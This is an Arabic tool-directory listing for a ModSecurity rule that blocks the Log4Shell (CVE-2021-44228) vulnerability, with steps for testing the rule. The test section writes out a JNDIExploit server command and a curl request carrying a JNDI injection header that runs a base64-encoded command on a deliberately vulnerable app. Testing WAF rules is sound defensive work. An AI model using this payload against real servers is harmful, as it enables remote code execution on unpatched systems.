Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/felipe8398/modsec-log4j2
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقالتعلم والتعليم
GitHubfelipe8398/modsec-log4j2

ModSec-log4j2

قاعدة ModSec لحماية log4j2 - CVE-2021-44228

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

اختبار قاعدة ModSec

المتطلبات الأساسية

  • يجب تثبيت Docker
  • يجب تثبيت Java على جهازك

تنفيذ الاختبار

  • تنفيذ git clone للمستودع
  • تنفيذ الأمر أدناه لرفع جدار الحماية WAF (ModSec) والتطبيق الضعيف
root@kitploit:~
docker stack deploy -c docker-compose.yml WAF
  • استخراج ملف JNDIExploit.v1.2.zip الموجود في المستودع، ثم الدخول إلى المجلد وتنفيذ الأمر أدناه، على أن يكون $IP هو عنوان IP الخاص بجهازك، ولا أنصح بوضع 127.0.0.1
root@kitploit:~
java -jar ./JNDIExploit-1.2-SNAPSHOT.jar -i $IP -p 8888
  • لاختبار RCE، نفّذ الأمر curl أدناه مع استبدال $IP بعنوان IP الخاص بجهازك، سيُنشئ ملفًا باسم pwned داخل /tmp للتطبيق الضعيف
root@kitploit:~
curl 127.0.0.1:80 -H 'X-Api-Version: ${jndi:ldap://$IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

أسئلة الجامعيين

1- كيف أعرف أن الـ WAF والتطبيق الويب الضعيف الخاص بي قد بدآ في العمل؟

نفّذ docker service ls، وتحقق من وجود خدمتين لكل منهما نسخة واحدة.

2- كيف أحصل على سجل modsec؟

نفّذ docker exec -ti $(docker container ls | grep "felipe8398/redirector:latest"| awk '{print $1}') cat /var/log/apache2/error.log

3- كيف أتحقق من أن RCE لم ينجح؟

إن الأمر curl الذي استخدمناه يُنشئ ملفًا باسم pwned داخل tmp، وبهذه الطريقة نحتاج إلى تنفيذ docker exec -ti $(docker container ls | grep ghcr.io/christophetd/log4shell-vulnerable-app:latest | awk '{print $1}') ls /tmp

تنزيل الأداة